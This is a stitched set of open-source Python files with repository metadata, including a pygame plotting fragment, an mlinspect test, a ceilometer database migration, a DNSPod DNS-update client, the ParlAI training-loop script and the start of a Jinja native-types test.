wheel_surface.set_colorkey((0, 0, 0))
pygame.surfarray.blit_array(wheel_surface, rot_wheel.swapaxes(0, 1))
self._screen.blit(wheel_surface, position)
# This one plot the nice wheel
def plot_camera(self, sensor_data, screen_position=[0, 0]):
if sensor_data.shape[2] < 3:
sensor_data = np.stack((sensor_data,) * 3, axis=2)
sensor_data = np.squeeze(sensor_data)
# print sensor_data.shape
self.set_array(sensor_data, screen_position)
pygame.display.flip()
def plot_camera_steer(self, sensor_data, steer, screen_position=[0, 0]):
if sensor_data.shape[2] < 3:
sensor_data = np.stack((sensor_data,) * 3, axis=2)
sensor_data = np.squeeze(sensor_data)
draw_path_on(sensor_data, 20, -steer * 10.0, (0, 255, 0))
self.set_array(sensor_data, screen_position)
pygame.display.flip()
def plot3camrcnoise(self, sensor_data, \
steer, noise, difference, \
screen_number=0):
# Define our fonts
# draw_path_on(img, 10, -angle_steers*40.0)
draw_path_on(sensor_data, 20, -steer * 20.0, (255, 0, 0))
draw_path_on(sensor_data, 20, -noise * 20.0, (0, 255, 0))
draw_path_on(sensor_data, 20, -difference * 20.0, (0, 0, 255))
#pygame.image.save(self._screen, "footage_offline/imgcamera" + str(self._render_iter) +".png")
self.set_array(sensor_data, screen_number)
self._render_iter += 1
pygame.display.flip()
| 34.204947
| 119
| 0.651343
|
462ba589dc818c120ac20739ea710091f3063832
| 1,486
|
py
|
Python
|
test/demo/feature_overview/test_missing_embeddings.py
|
tum-db/mlinspect4sql
|
863f1a98baff92341722b4fb180008cf9b518b80
|
[
"Apache-2.0"
] | 40
|
2020-10-20T15:56:35.000Z
|
2022-02-22T14:48:09.000Z
|
test/demo/feature_overview/test_missing_embeddings.py
|
tum-db/mlinspect4sql
|
863f1a98baff92341722b4fb180008cf9b518b80
|
[
"Apache-2.0"
] | 55
|
2020-10-21T15:37:44.000Z
|
2022-02-10T02:44:18.000Z
|
test/demo/feature_overview/test_missing_embeddings.py
|
tum-db/mlinspect4sql
|
863f1a98baff92341722b4fb180008cf9b518b80
|
[
"Apache-2.0"
] | 9
|
2021-01-15T15:53:25.000Z
|
2022-03-31T23:42:12.000Z
|
"""
Tests whether MissingEmbeddings works
"""
from inspect import cleandoc
from testfixtures import compare
from demo.feature_overview.missing_embeddings import MissingEmbeddings, MissingEmbeddingsInfo
from example_pipelines.healthcare import custom_monkeypatching
from mlinspect._pipeline_inspector import PipelineInspector
def test_missing_embeddings():
"""
Tests whether MissingEmbeddings works for joins
"""
test_code = cleandoc("""
import pandas as pd
from example_pipelines.healthcare.healthcare_utils import MyW2VTransformer
df = pd.DataFrame({'A': ['cat_a', 'cat_b', 'cat_a', 'cat_c']})
word_to_vec = MyW2VTransformer(min_count=2, size=2, workers=1)
encoded_data = word_to_vec.fit_transform(df)
""")
inspector_result = PipelineInspector \
.on_pipeline_from_string(test_code) \
.add_required_inspection(MissingEmbeddings(10)) \
.add_custom_monkey_patching_module(custom_monkeypatching) \
.execute()
inspection_results = list(inspector_result.dag_node_to_inspection_results.values())
missing_embeddings_output = inspection_results[0][MissingEmbeddings(10)]
expected_result = None
compare(missing_embeddings_output, expected_result)
missing_embeddings_output = inspection_results[1][MissingEmbeddings(10)]
expected_result = MissingEmbeddingsInfo(2, ['cat_b', 'cat_c'])
compare(missing_embeddings_output, expected_result)
| 37.15
| 93
| 0.744953
|
887d12d7ef6f50acf936b685948f73adca051000
| 4,590
|
py
|
Python
|
ceilometer/storage/sqlalchemy/migrate_repo/versions/021_add_event_types.py
|
NeCTAR-RC/ceilometer
|
25cb8740b83bfbf5c526be816fa3ae10f936bff5
|
[
"Apache-2.0"
] | 1
|
2015-02-26T03:23:09.000Z
|
2015-02-26T03:23:09.000Z
|
ceilometer/storage/sqlalchemy/migrate_repo/versions/021_add_event_types.py
|
NeCTAR-RC/ceilometer
|
25cb8740b83bfbf5c526be816fa3ae10f936bff5
|
[
"Apache-2.0"
] | null | null | null |
ceilometer/storage/sqlalchemy/migrate_repo/versions/021_add_event_types.py
|
NeCTAR-RC/ceilometer
|
25cb8740b83bfbf5c526be816fa3ae10f936bff5
|
[
"Apache-2.0"
] | null | null | null |
# -*- encoding: utf-8 -*-
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from migrate import ForeignKeyConstraint
from sqlalchemy import Column
from sqlalchemy import Integer
from sqlalchemy import MetaData
from sqlalchemy import select
from sqlalchemy import String
from sqlalchemy import Table
from ceilometer.storage.sqlalchemy import migration
def upgrade(migrate_engine):
meta = MetaData(bind=migrate_engine)
event_type = Table(
'event_type', meta,
Column('id', Integer, primary_key=True),
Column('desc', String(255), unique=True),
mysql_engine='InnoDB',
mysql_charset='utf8',
)
event_type.create()
event = Table('event', meta, autoload=True)
unique_name = Table('unique_name', meta, autoload=True)
# Event type is a specialization of Unique name, so
# we insert into the event_type table all the distinct
# unique names from the event.unique_name field along
# with the key from the unique_name table, and
# then rename the event.unique_name field to event.event_type
conn = migrate_engine.connect()
sql = ("INSERT INTO event_type "
"SELECT unique_name.id, unique_name.key FROM event "
"INNER JOIN unique_name "
"ON event.unique_name_id = unique_name.id "
"GROUP BY unique_name.id")
conn.execute(sql)
conn.close()
# Now we need to drop the foreign key constraint, rename
# the event.unique_name column, and re-add a new foreign
# key constraint
params = {'columns': [event.c.unique_name_id],
'refcolumns': [unique_name.c.id]}
if migrate_engine.name == 'mysql':
params['name'] = "event_ibfk_1"
fkey = ForeignKeyConstraint(**params)
fkey.drop()
Column('event_type_id', Integer).create(event)
# Move data from unique_name_id column into event_type_id column
# and delete the entry from the unique_name table
query = select([event.c.id, event.c.unique_name_id])
for key, value in migration.paged(query):
event.update().where(event.c.id == key)\
.values({"event_type_id": value}).execute()
unique_name.delete()\
.where(unique_name.c.id == key).execute()
params = {'columns': [event.c.event_type_id],
'refcolumns': [event_type.c.id]}
if migrate_engine.name == 'mysql':
params['name'] = "_".join(('fk', 'event_type', 'id'))
fkey = ForeignKeyConstraint(**params)
fkey.create()
event.c.unique_name_id.drop()
def downgrade(migrate_engine):
meta = MetaData(bind=migrate_engine)
event_type = Table('event_type', meta, autoload=True)
event = Table('event', meta, autoload=True)
unique_name = Table('unique_name', meta, autoload=True)
# Re-insert the event type table records into the old
# unique_name table.
conn = migrate_engine.connect()
sql = ("INSERT INTO unique_name "
"SELECT event_type.id, event_type.desc FROM event_type")
conn.execute(sql)
conn.close()
# Drop the foreign key constraint to event_type, drop the
# event_type table, rename the event.event_type column to
# event.unique_name, and re-add the old foreign
# key constraint
params = {'columns': [event.c.event_type_id],
'refcolumns': [event_type.c.id]}
if migrate_engine.name == 'mysql':
params['name'] = "_".join(('fk', 'event_type', 'id'))
fkey = ForeignKeyConstraint(**params)
fkey.drop()
event_type.drop()
Column('unique_name_id', Integer).create(event)
# Move data from event_type_id column to unique_name_id column
query = select([event.c.id, event.c.event_type_id])
for key, value in migration.paged(query):
event.update().where(event.c.id == key)\
.values({"unique_name_id": value}).execute()
event.c.event_type_id.drop()
params = {'columns': [event.c.unique_name_id],
'refcolumns': [unique_name.c.id]}
if migrate_engine.name == 'mysql':
params['name'] = 'event_ibfk_1'
fkey = ForeignKeyConstraint(**params)
fkey.create()
| 37.622951
| 75
| 0.675163
|
fed90976c491e9644672fdf0ac0a9124a9ae4257
| 5,383
|
py
|
Python
|
dns/dnspod.py
|
gary-jiao/DDNS
|
99ffdf020cb4310a94bbcac5a48ead59a9f5539f
|
[
"MIT"
] | 1
|
2018-12-02T13:56:03.000Z
|
2018-12-02T13:56:03.000Z
|
dns/dnspod.py
|
gary-jiao/DDNS
|
99ffdf020cb4310a94bbcac5a48ead59a9f5539f
|
[
"MIT"
] | null | null | null |
dns/dnspod.py
|
gary-jiao/DDNS
|
99ffdf020cb4310a94bbcac5a48ead59a9f5539f
|
[
"MIT"
] | null | null | null |
# coding=utf-8
"""
DNSPOD API
DNSPOD 接口解析操作库
http://www.dnspod.cn/docs/domains.html
@author: New Future
"""
import json
import logging as log
try:
# python 2
from httplib import HTTPSConnection
import urllib
except ImportError:
# python 3
from http.client import HTTPSConnection
import urllib.parse as urllib
__author__ = 'New Future'
ID = "token id"
TOKEN = "token key"
PROXY = None # 代理设置
API_SITE = "dnsapi.cn"
API_METHOD = "POST"
def request(action, param=None, **params):
"""
发送请求数据
"""
if param:
params.update(param)
params.update({'login_token': "%s,%s" % (ID, TOKEN), 'format': 'json'})
log.debug("%s : params:%s", action, params)
if PROXY:
conn = HTTPSConnection(PROXY)
conn.set_tunnel(API_SITE, 443)
else:
conn = HTTPSConnection(API_SITE)
conn.request(API_METHOD, '/' + action, urllib.urlencode(params),
{"Content-type": "application/x-www-form-urlencoded"})
response = conn.getresponse()
res = response.read()
conn.close()
if response.status < 200 or response.status >= 300:
raise Exception(res)
else:
data = json.loads(res.decode('utf8'))
if not data:
raise Exception("empty response")
elif data.get("status", {}).get("code") == "1":
return data
else:
raise Exception(data.get('status', {}))
def get_domain_info(domain):
"""
切割域名获取主域名和对应ID
"""
domain_split = domain.split('.')
if len(domain_split) == 3: # 长度为3
sub, main = domain_split[0], domain_split[1] + '.' + domain_split[2]
did = get_domain_id(main)
else: # 长度大于三通过API判断,最后两个,三个递增
main = domain_split.pop()
while domain_split:
main = domain_split.pop() + '.' + main
did = get_domain_id(main)
if did:
sub = ".".join(domain_split)
break
else:
return None, None
if not sub: # root domain根域名https://github.com/NewFuture/DDNS/issues/9
sub = '@'
return did, sub
def get_domain_id(domain):
"""
获取域名ID
http://www.dnspod.cn/docs/domains.html#domain-info
"""
if not hasattr(get_domain_id, "domain_list"):
get_domain_id.domain_list = {} # "静态变量"存储已查询过的id
if domain in get_domain_id.domain_list:
# 如果已经存在直接返回防止再次请求
return get_domain_id.domain_list[domain]
else:
info = request('Domain.Info', domain=domain)
if info and info.get('status', {}).get('code') == "1":
did = info.get("domain", {}).get("id")
if did:
get_domain_id.domain_list[domain] = did
return did
def get_records(did, **conditions):
"""
获取记录ID
返回满足条件的所有记录[]
TODO 大于3000翻页
http://www.dnspod.cn/docs/records.html#record-list
"""
if not hasattr(get_records, "records"):
get_records.records = {} # "静态变量"存储已查询过的id
get_records.keys = ("id", "name", "type", "line",
"line_id", "enabled", "mx", "value")
if not did in get_records.records:
get_records.records[did] = {}
data = request('Record.List', domain_id=did)
if data:
for record in data.get('records'):
get_records.records[did][record["id"]] = {
k: v for (k, v) in record.items() if k in get_records.keys}
records = {}
for (did, record) in get_records.records[did].items():
for (k, value) in conditions.items():
if record.get(k) != value:
break
else: # for else push
records[did] = record
return records
def update_record(domain, value, record_type="A"):
"""
更新记录
"""
log.debug(">>>>>%s(%s)", domain, record_type)
domainid, sub = get_domain_info(domain)
if not domainid:
raise Exception("invalid domain: [ %s ] " % domain)
records = get_records(domainid, name=sub, type=record_type)
result = {}
if records: # update
# http://www.dnspod.cn/docs/records.html#record-modify
for (did, record) in records.items():
if record["value"] != value:
log.debug(sub, record)
res = request('Record.Modify', record_id=did, record_line=record["line"].encode(
"utf-8"), value=value, sub_domain=sub, domain_id=domainid, record_type=record_type)
if res:
get_records.records[domainid][did]["value"] = value
result[did] = res.get("record")
else:
result[did] = "update fail!\n" + str(res)
else:
result[did] = domain
else: # create
# http://www.dnspod.cn/docs/records.html#record-create
res = request("Record.Create", domain_id=domainid, value=value,
sub_domain=sub, record_type=record_type, record_line="默认", ttl=600)
if res:
did = res.get("record")["id"]
get_records.records[domainid][did] = res.get("record")
get_records.records[domainid][did].update(
value=value, sub_domain=sub, record_type=record_type)
result = res.get("record")
else:
result = domain + " created fail!"
return result
| 30.76
| 103
| 0.565298
|
dfbca10a1b7b3c043fbd9c7dc873e0c7144eb64a
| 25,601
|
py
|
Python
|
parlai/scripts/train_model.py
|
christiancosgrove/cs767hw3
|
7c906d7b92394cc30ed94a714b199467c269cadf
|
[
"MIT"
] | null | null | null |
parlai/scripts/train_model.py
|
christiancosgrove/cs767hw3
|
7c906d7b92394cc30ed94a714b199467c269cadf
|
[
"MIT"
] | null | null | null |
parlai/scripts/train_model.py
|
christiancosgrove/cs767hw3
|
7c906d7b92394cc30ed94a714b199467c269cadf
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""
Training script for ParlAI.
The standard way to train a model. After training, also computes validation
and test error.
The user must provide a model (with ``--model``) and a task (with ``--task``).
Examples
--------
.. code-block:: shell
python -m parlai.scripts.train_model -m ir_baseline -t dialog_babi:Task:1 -mf /tmp/model
python -m parlai.scripts.train_model -m seq2seq -t babi:Task10k:1 -mf '/tmp/model' -bs 32 -lr 0.5 -hs 128
python -m parlai.scripts.train_model -m drqa -t babi:Task10k:1 -mf /tmp/model -bs 10
""" # noqa: E501
# TODO List:
# * More logging (e.g. to files), make things prettier.
import json
import numpy as np
import os
import signal
from parlai.core.metrics import Metric
from parlai.core.agents import create_agent, create_agent_from_shared
from parlai.core.exceptions import StopTrainException
from parlai.core.logs import TensorboardLogger
from parlai.core.metrics import aggregate_named_reports, aggregate_unnamed_reports
from parlai.core.params import ParlaiParser, print_announcements
from parlai.core.worlds import create_task
from parlai.scripts.build_dict import build_dict, setup_args as setup_dict_args
from parlai.utils.distributed import (
sync_object,
is_primary_worker,
all_gather_list,
is_distributed,
num_workers,
)
from parlai.utils.misc import Timer, nice_report
def setup_args(parser=None) -> ParlaiParser:
"""
Build the ParlAI parser, adding command line args if necessary.
:param ParlaiParser parser:
Preexisting parser to append options to. Will be created if needed.
:returns:
the ParlaiParser with CLI options added.
"""
if parser is None:
parser = ParlaiParser(True, True, 'Train a model')
train = parser.add_argument_group('Training Loop Arguments')
train.add_argument(
'-et',
'--evaltask',
help='task to use for valid/test (defaults to the one used for training)',
)
train.add_argument(
'--eval-batchsize',
type=int,
hidden=True,
help='Eval time batch size (defaults to same as -bs)',
)
train.add_argument('--display-examples', type='bool', default=False, hidden=True)
train.add_argument('-eps', '--num-epochs', type=float, default=-1)
train.add_argument('-ttim', '--max-train-time', type=float, default=-1)
train.add_argument('-ltim', '--log-every-n-secs', type=float, default=2)
train.add_argument(
'-vtim',
'--validation-every-n-secs',
type=float,
default=-1,
help='Validate every n seconds. Saves model to model_file '
'(if set) whenever best val metric is found',
)
train.add_argument(
'-stim',
'--save-every-n-secs',
type=float,
default=-1,
help='Saves the model to model_file.checkpoint after '
'every n seconds (default -1, never).',
)
train.add_argument(
'-sval',
'--save-after-valid',
type='bool',
default=False,
help='Saves the model to model_file.checkpoint after '
'every validation (default %(default)s).',
)
train.add_argument(
'-veps',
'--validation-every-n-epochs',
type=float,
default=-1,
help='Validate every n epochs. Saves model to model_file '
'(if set) whenever best val metric is found',
)
train.add_argument(
'-vme',
'--validation-max-exs',
type=int,
default=-1,
hidden=True,
help='max examples to use during validation (default -1 uses all)',
)
train.add_argument(
'--short-final-eval',
default=False,
hidden=True,
type='bool',
help='If true, obeys --validation-max-exs in the final '
'validation and test evaluations.',
)
train.add_argument(
'-vp',
'--validation-patience',
type=int,
default=10,
help=(
'number of iterations of validation where result'
' does not improve before we stop training'
),
)
train.add_argument(
'-vmt',
'--validation-metric',
default='accuracy',
help='key into report table for selecting best validation',
)
train.add_argument(
'-vmm',
'--validation-metric-mode',
type=str,
choices=['max', 'min'],
help='how to optimize validation metric (max or min)',
)
train.add_argument(
'-vcut',
'--validation-cutoff',
type=float,
default=1.0,
hidden=True,
help='value at which training will stop if exceeded by metric',
)
train.add_argument(
'-lfc',
'--load-from-checkpoint',
type='bool',
default=False,
hidden=True,
help='load model from checkpoint if available',
)
train.add_argument(
'-vshare',
'--validation-share-agent',
default=False,
hidden=True,
help='use a shared copy of the agent for validation. '
'this will eventually default to True, but '
'currently defaults to False.',
)
train.add_argument(
'-mcs',
'--metrics',
type=str,
default='default',
help='list of metrics to show/compute, e.g. all, default,'
'or give a list split by , like '
'ppl,f1,accuracy,hits@1,rouge,bleu'
'the rouge metrics will be computed as rouge-1, rouge-2 and rouge-l',
)
TensorboardLogger.add_cmdline_args(parser)
parser = setup_dict_args(parser)
return parser
def load_eval_worlds(agent, opt, datatype):
"""
Create a new eval world for the agent and the given opt.
Overrides the datatype options for doing this. Handles some magic
overrides of other special options for the training script.
:param Agent agent:
The model being trained.
:param Opt opt:
The global CLI opts.
:param string datatype:
The new datatype.
"""
if not is_primary_worker():
# don't load worlds in workers
# TODO(MW): this block will need to be removed
return None
if 'stream' in opt['datatype']:
datatype += ':stream'
opt = opt.copy()
opt['datatype'] = datatype
if opt.get('evaltask'):
# if a different eval task is specified, use it.
opt['task'] = opt['evaltask']
if opt.get('eval_batchsize'):
# override eval time batchsize
opt['batchsize'] = opt['eval_batchsize']
tasks = opt['task'].split(',')
worlds = []
# possibly load agent
if opt.get('validation_share_agent', False):
valid_agent = create_agent_from_shared(agent.share())
else:
valid_agent = agent
# create worlds
for task in tasks:
task_opt = opt.copy() # copy opt since we edit the task
task_opt['task'] = task
valid_world = create_task(task_opt, valid_agent)
worlds.append(valid_world)
return worlds
def _run_single_eval(opt, valid_world, max_exs):
# run evaluation on a single world
valid_world.reset()
cnt = 0
max_cnt = max_exs if max_exs > 0 else float('inf')
while not valid_world.epoch_done() and cnt < max_cnt:
valid_world.parley()
if cnt == 0 and opt['display_examples']:
print(valid_world.display() + '\n~~')
print(valid_world.report())
cnt = valid_world.report().get('exs') or 0
valid_report = valid_world.report()
valid_world.reset() # make sure world doesn't remember valid data
return valid_report
def run_eval(valid_worlds, opt, datatype, max_exs=-1, write_log=False):
"""
Eval on validation/test data.
:param valid_world:
list of the pre-created validation worlds.
:param opt:
the options that specific the task, eval_task, etc
:param datatype:
the datatype to use, such as "valid" or "test"
:param bool write_log:
specifies to write metrics to file if the model_file is set
:param int max_exs:
limits the number of examples if max_exs > 0
"""
if valid_worlds is None:
# This isn't the primary worker, so we can just skip evaluation
return sync_object(None)
print('[ running eval: ' + datatype + ' ]')
timer = Timer()
reports = []
for v_world in valid_worlds:
task_report = _run_single_eval(opt, v_world, max_exs / len(valid_worlds))
reports.append(task_report)
tasks = [world.getID() for world in valid_worlds]
named_reports = dict(zip(tasks, reports))
report = aggregate_named_reports(named_reports)
metrics = f'{datatype}:{nice_report(report)}'
print(f'[ eval completed in {timer.time():.2f}s ]')
print(metrics)
# write to file
if write_log and opt.get('model_file'):
# Write out metrics
f = open(opt['model_file'] + '.' + datatype, 'a+')
f.write(f'{metrics}\n')
f.close()
return sync_object(report)
class TrainLoop:
"""
TrainLoop contains the core training loop logic.
"""
def __init__(self, opt):
# if python is called from a non-interactive shell, like a bash script,
# it will by-default ignore SIGINTs, and KeyboardInterrupt exceptions are
# not produced. This line brings them back
signal.signal(signal.SIGINT, signal.default_int_handler)
if isinstance(opt, ParlaiParser):
print('[ Deprecated Warning: TrainLoop should be passed opt not Parser ]')
opt = opt.parse_args()
# Possibly load from checkpoint
trainstats_suffix = '.trainstats' # we might load training statistics from here
if (
opt['load_from_checkpoint']
and opt.get('model_file')
and os.path.isfile(opt['model_file'] + '.checkpoint')
):
opt['init_model'] = opt['model_file'] + '.checkpoint'
trainstats_suffix = '.checkpoint.trainstats'
# Possibly build a dictionary (not all models do this).
if not (opt.get('dict_file') or opt.get('model_file')):
raise RuntimeError(
'WARNING: For train_model, please specify either a '
'model_file or dict_file.'
)
if 'dict_file' in opt:
if opt['dict_file'] is None and opt.get('model_file'):
opt['dict_file'] = opt['model_file'] + '.dict'
print("[ building dictionary first... ]")
build_dict(opt, skip_if_built=True)
# Create model and assign it to the specified task
self.agent = create_agent(opt)
self.world = create_task(opt, self.agent)
# set up timers
self.train_time = Timer()
self.validate_time = Timer()
self.log_time = Timer()
self.save_time = Timer()
print('[ training... ]')
self.parleys = 0
self.max_num_epochs = (
opt['num_epochs'] if opt['num_epochs'] > 0 else float('inf')
)
self.max_train_time = (
opt['max_train_time'] if opt['max_train_time'] > 0 else float('inf')
)
self.log_every_n_secs = (
opt['log_every_n_secs'] if opt['log_every_n_secs'] > 0 else float('inf')
)
self.val_every_n_secs = (
opt['validation_every_n_secs']
if opt['validation_every_n_secs'] > 0
else float('inf')
)
self.save_every_n_secs = (
opt['save_every_n_secs'] if opt['save_every_n_secs'] > 0 else float('inf')
)
self.val_every_n_epochs = (
opt['validation_every_n_epochs']
if opt['validation_every_n_epochs'] > 0
else float('inf')
)
# smart defaults for --validation-metric-mode
if opt['validation_metric'] in {'loss', 'ppl', 'mean_rank'}:
opt['validation_metric_mode'] = 'min'
elif opt['validation_metric'] in {'accuracy', 'hits@1', 'hits@5', 'f1', 'bleu'}:
opt['validation_metric_mode'] = 'max'
if opt.get('validation_metric_mode') is None:
opt['validation_metric_mode'] = 'max'
self.last_valid_epoch = 0
self.valid_optim = 1 if opt['validation_metric_mode'] == 'max' else -1
self.valid_reports = []
self.best_valid = None
self.impatience = 0
self.saved = False
self.valid_worlds = None
self.opt = opt
# we may have been preempted, make sure we note that amount
self._preempted_epochs = 0.0
if opt.get('model_file') and os.path.isfile(
opt['model_file'] + trainstats_suffix
):
# looks like we were preempted. make sure we load up our total
# training stats, etc
with open(opt['model_file'] + trainstats_suffix) as ts:
obj = json.load(ts)
self.parleys = obj.get('parleys', 0)
self._preempted_epochs = obj.get('total_epochs', 0)
self.train_time.total = obj.get('train_time', 0)
self.impatience = obj.get('impatience', 0)
self.valid_reports = obj.get('valid_reports', [])
if 'best_valid' in obj:
self.best_valid = obj['best_valid']
else:
# old method
if opt.get('model_file') and os.path.isfile(
opt['model_file'] + '.best_valid'
):
with open(opt['model_file'] + ".best_valid", 'r') as f:
x = f.readline()
self.best_valid = float(x)
f.close()
if opt['tensorboard_log'] and is_primary_worker():
self.tb_logger = TensorboardLogger(opt)
def save_model(self, suffix=None):
"""
Save the model to disk, possibly with a suffix.
"""
if not is_primary_worker():
# never do IO as a non-primary worker
return
if not self.opt.get('model_file'):
# nothing to save to, just exit
return
fn = self.opt['model_file']
if suffix:
fn += suffix
while True:
# don't ever let a ctrl-c interrupt saving
try:
self.agent.save(fn)
self._save_train_stats(suffix)
break
except KeyboardInterrupt:
pass
def _safe_report(self, report):
return {k: v.value() if isinstance(v, Metric) else v for k, v in report.items()}
def _save_train_stats(self, suffix=None):
fn = self.opt['model_file']
if suffix:
fn += suffix
fn += '.trainstats'
with open(fn, 'w') as f:
json.dump(
{
'parleys': self.parleys,
'train_time': self.train_time.time(),
'total_epochs': (
self._preempted_epochs
+ num_workers() * self.world.get_total_epochs()
),
'impatience': self.impatience,
'valid_reports': [self._safe_report(v) for v in self.valid_reports],
'best_valid': self.best_valid,
},
f,
)
def validate(self):
"""
Perform a validation run, checking whether we should stop training.
:return: boolean indicating whether training should stop
:rtype: bool
"""
opt = self.opt
if self.valid_worlds is None:
# we need to load the world now
self.valid_worlds = load_eval_worlds(self.agent, opt, 'valid')
# run evaluation on valid set
# TODO(MW): replace sync_object with self._sync_metrics. You'll need some
# logic to handle 'validation_max_exs' properly
valid_report = run_eval(
self.valid_worlds, opt, 'valid', opt['validation_max_exs']
)
v = valid_report.copy()
v['train_time'] = self.train_time.time()
self.valid_reports.append(v)
# logging
if opt['tensorboard_log'] and is_primary_worker():
self.tb_logger.log_metrics('valid', self.parleys, valid_report)
# flush on a validation
self.tb_logger.flush()
# saving
if (
opt.get('model_file')
and opt.get('save_after_valid')
and is_primary_worker()
):
print("[ saving model checkpoint: " + opt['model_file'] + ".checkpoint ]")
self.save_model('.checkpoint')
# send valid metrics to agent if the agent wants them
if hasattr(self.agent, 'receive_metrics'):
self.agent.receive_metrics(valid_report)
# check which metric to look at
print('Valid report ', valid_report)
new_valid = valid_report[opt['validation_metric']]
if isinstance(new_valid, Metric):
new_valid = new_valid.value()
# check if this is the best validation so far
if (
self.best_valid is None
or self.valid_optim * new_valid > self.valid_optim * self.best_valid
):
print(
'[ new best {}: {}{} ]'.format(
opt['validation_metric'],
new_valid,
' (previous best was {})'.format(self.best_valid)
if self.best_valid is not None
else '',
)
)
self.best_valid = new_valid
self.impatience = 0
if opt.get('model_file') and is_primary_worker():
print("[ saving best valid model: " + opt['model_file'] + " ]")
self.save_model()
self.saved = True
if (
opt['validation_metric'] == 'accuracy'
and self.best_valid >= opt['validation_cutoff']
):
print('[ task solved! stopping. ]')
return True
else:
self.impatience += 1
print(
'[ did not beat best {}: {} impatience: {} ]'.format(
opt['validation_metric'], round(self.best_valid, 4), self.impatience
)
)
self.validate_time.reset()
# check if we are out of patience
if (
opt['validation_patience'] > 0
and self.impatience >= opt['validation_patience']
):
print('[ ran out of patience! stopping training. ]')
return True
return False
def _sync_metrics(self, metrics):
"""
Sync training metrics across workers.
A handful of special cases are handled as exceptions, and the remaining metrics
are simply averaged across workers.
"""
if not is_distributed():
# nothing special needed
return metrics
all_versions = all_gather_list(metrics)
return aggregate_unnamed_reports(all_versions)
def _compute_eta(self, epochs_completed, time_elapsed):
"""
Compute the estimated seconds remaining in training.
:param float epochs_completed: number of epochs already completed.
:param float time_elapsed: total time spent already, in seconds.
:return: ETA in seconds, or None if not computable
"""
# start off with no estimate
eta = None
# Determine time_left and num_epochs
max_epochs = self.opt.get('num_epochs', 0)
if max_epochs > 0 and epochs_completed > 0:
epoch_progress = epochs_completed / max_epochs
eta = (1 - epoch_progress) * time_elapsed / epoch_progress
max_training_time = self.opt.get('max_training_time', -1)
if max_training_time > 0:
time_left = max_training_time - time_elapsed
if eta is None or time_left < eta:
eta = time_left
return eta
def log(self):
"""
Output a training log entry.
"""
opt = self.opt
if opt['display_examples']:
print(self.world.display() + '\n~~')
logs = []
# get report
train_report = self.world.report()
train_report = self._sync_metrics(train_report)
self.world.reset_metrics()
# time elapsed
logs.append('time:{}s'.format(np.floor(self.train_time.time())))
logs.append('total_exs:{}'.format(self._total_exs))
if self._total_epochs >= 0:
# only if it's unbounded
logs.append('epochs:{}'.format(round(self._total_epochs, 2)))
time_left = self._compute_eta(self._total_epochs, self.train_time.time())
if time_left is not None:
logs.append('time_left:{}s'.format(max(0, np.ceil(time_left))))
log = '[ {} ] {}'.format(' '.join(logs), nice_report(train_report))
print(log)
self.log_time.reset()
if opt['tensorboard_log'] and is_primary_worker():
self.tb_logger.log_metrics('train', self.parleys, train_report)
def train(self):
"""
Perform a training run.
:return: tuple of reports (validation_report, test_report)
"""
opt = self.opt
world = self.world
with world:
while True:
# do one example / batch of examples
try:
world.parley()
except StopTrainException:
if is_distributed():
raise RuntimeError(
"StopTrainException not supported for " "distributed mode"
)
break
self.parleys += 1
# get the total training examples done, compute epochs
self._total_epochs = (
self._preempted_epochs
+ num_workers() * self.world.get_total_epochs()
)
exs_per_epoch = self.world.num_examples()
self._total_exs = int(np.round(self._total_epochs * exs_per_epoch))
# and use the primary worker's timings for everything
train_time, log_time, validate_time = sync_object(
(
self.train_time.time(),
self.log_time.time(),
self.validate_time.time(),
)
)
# check counters and timers
if self._total_epochs >= self.max_num_epochs:
self.log()
print(
'[ num_epochs completed:{} time elapsed:{}s ]'.format(
self.max_num_epochs, train_time
)
)
break
if train_time > self.max_train_time:
print('[ max_train_time elapsed:{}s ]'.format(train_time))
break
if log_time > self.log_every_n_secs:
self.log()
if (
validate_time > self.val_every_n_secs
or self._total_epochs - self.last_valid_epoch
>= self.val_every_n_epochs
):
try:
stop_training = self.validate()
except StopTrainException:
if is_distributed():
raise RuntimeError(
"StopTrainException not "
"supported for distributed mode"
)
break
self.last_valid_epoch = self._total_epochs
if stop_training:
break
if (
self.save_time.time() > self.save_every_n_secs
and opt.get('model_file')
and is_primary_worker()
):
print(
"[ saving model checkpoint: {}.checkpoint".format(
opt['model_file']
)
)
self.save_model('.checkpoint')
self.save_time.reset()
if not self.saved and is_primary_worker():
# save agent
self.save_model()
elif opt.get('model_file'):
# reload best validation model
self.agent = create_agent(opt)
valid_worlds = load_eval_worlds(self.agent, opt, 'valid')
max_exs = opt['validation_max_exs'] if opt.get('short_final_eval') else -1
v_report = run_eval(valid_worlds, opt, 'valid', max_exs, write_log=True)
test_worlds = load_eval_worlds(self.agent, opt, 'test')
t_report = run_eval(test_worlds, opt, 'test', max_exs, write_log=True)
if valid_worlds:
for valid_world in valid_worlds:
valid_world.shutdown()
if test_worlds:
for test_world in test_worlds:
test_world.shutdown()
print_announcements(opt)
return v_report, t_report
if __name__ == '__main__':
TrainLoop(setup_args().parse_args()).train()
print()
| 34.92633
| 107
| 0.563494
|
a98ac5b8d1ef3b14240afa65683e706a885714f5
| 4,485
|
py
|
Python
|
tests/test_nativetypes.py
|
cav71/jinja
|
7cf6ffc4f11b5380865fd31a45572fcf1759c4e5
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_nativetypes.py
|
cav71/jinja
|
7cf6ffc4f11b5380865fd31a45572fcf1759c4e5
|
[
"BSD-3-Clause"
] | null | null | null |
tests/test_nativetypes.py
|
cav71/jinja
|
7cf6ffc4f11b5380865fd31a45572fcf1759c4e5
|
[
"BSD-3-Clause"
] | null | null | null |
import pytest
from jinja2._compat import text_type
from jinja2.exceptions import UndefinedError
from jinja2.nativetypes import NativeEnvironment
from jinja2.runtime import Undefined
@pytest.fixture
def env():
return NativeEnvironment()
class TestNativeEnvironment(object):
def test_is_defined_native_return(self, env):
t = env.from_string('{{ missing is defined }}')
assert not t.render()
def test_undefined_native_return(self, env):
t = env.from_string('{{ missing }}')
assert isinstance(t.render(), Undefined)
def test_adding_undefined_native_return(self, env):
